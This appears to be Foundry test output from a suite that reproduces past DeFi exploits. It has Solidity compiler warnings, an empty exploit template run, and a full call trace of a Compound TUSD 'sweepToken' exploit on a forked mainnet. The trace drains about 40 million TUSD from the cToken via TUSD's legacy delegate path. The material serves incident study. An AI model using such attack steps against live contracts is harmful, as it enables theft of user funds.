Compiling 20 files with Solc 0.8.10
Compiling 21 files with Solc 0.8.28
Solc 0.8.28 finished in 884.41ms
Solc 0.8.10 finished in 1.07s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 493.06ms (5.98ms CPU time)

Ran 1 test for src/test/2022-03/CompoundTusd_exp.sol:ContractTest
[PASS] testExample() (gas: 76941)
Logs:
  Before exploit, Compound TUSD balance:: 39961358379339258374306712
  After exploit, Compound TUSD balance:: 0

Traces:
  [5795] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 14266479 [1.426e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [81741] ContractTest::testExample()
    ├─ [7707] 0x0000000000085d4780B73119b644AE5ecd22b376::balanceOf(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86) [staticcall]
    │   ├─ [2508] 0xffc40F39806F1400d8278BfD33823705b5a4c196::balanceOf(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86) [delegatecall]
    │   │   └─ ← [Return] 39961358379339258374306712 [3.996e25]
    │   └─ ← [Return] 39961358379339258374306712 [3.996e25]
    ├─ emit log_named_uint(key: "Before exploit, Compound TUSD balance:", val: 39961358379339258374306712 [3.996e25])
    ├─ [53896] 0x12392F67bdf24faE0AF363c24aC620a2f67DAd86::sweepToken(0x8dd5fbCe2F6a956C3022bA3663759011Dd51e73E)
    │   ├─ [48682] 0xa035b9e130F2B1AedC733eEFb1C67Ba4c503491F::sweepToken(0x8dd5fbCe2F6a956C3022bA3663759011Dd51e73E) [delegatecall]
    │   │   ├─ [4951] 0x8dd5fbCe2F6a956C3022bA3663759011Dd51e73E::balanceOf(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86) [staticcall]
    │   │   │   ├─ [1247] 0x0000000000085d4780B73119b644AE5ecd22b376::delegateBalanceOf(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86)
    │   │   │   │   ├─ [548] 0xffc40F39806F1400d8278BfD33823705b5a4c196::delegateBalanceOf(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000210e259419ba44043abb98
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000210e259419ba44043abb98
    │   │   │   └─ ← [Return] 39961358379339258374306712 [3.996e25]
    │   │   ├─ [35826] 0x8dd5fbCe2F6a956C3022bA3663759011Dd51e73E::transfer(0x6d903f6003cca6255D85CcA4D3B5E5146dC33925, 39961358379339258374306712 [3.996e25])
    │   │   │   ├─ [33741] 0x0000000000085d4780B73119b644AE5ecd22b376::delegateTransfer(0x6d903f6003cca6255D85CcA4D3B5E5146dC33925, 39961358379339258374306712 [3.996e25], 0x12392F67bdf24faE0AF363c24aC620a2f67DAd86)
    │   │   │   │   ├─ [33030] 0xffc40F39806F1400d8278BfD33823705b5a4c196::delegateTransfer(0x6d903f6003cca6255D85CcA4D3B5E5146dC33925, 39961358379339258374306712 [3.996e25], 0x12392F67bdf24faE0AF363c24aC620a2f67DAd86) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0x12392F67bdf24faE0AF363c24aC620a2f67DAd86, to: 0x6d903f6003cca6255D85CcA4D3B5E5146dC33925, value: 39961358379339258374306712 [3.996e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xd8442c492d808c32ae7295630b24e28d8ac3f904c9bbfd5d1a8f5cd0840dd69a: 0 → 0x000000000000000000000000000000000000000000210e259419ba44043abb98
    │   │   │   │   │   │   @ 0x1b13e8da2ac63131998ee32305704af215978f151f1646bbe670a6666596bfd7: 0x000000000000000000000000000000000000000000210e259419ba44043abb98 → 0
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [1207] 0x0000000000085d4780B73119b644AE5ecd22b376::balanceOf(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86) [staticcall]
    │   ├─ [508] 0xffc40F39806F1400d8278BfD33823705b5a4c196::balanceOf(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "After exploit, Compound TUSD balance:", val: 0)
    ├─  storage changes:
    │   @ 0xd8442c492d808c32ae7295630b24e28d8ac3f904c9bbfd5d1a8f5cd0840dd69a: 0 → 0x000000000000000000000000000000000000000000210e259419ba44043abb98
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 8.62s (6.82s CPU time)

Ran 2 test suites in 9.45s (9.11s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
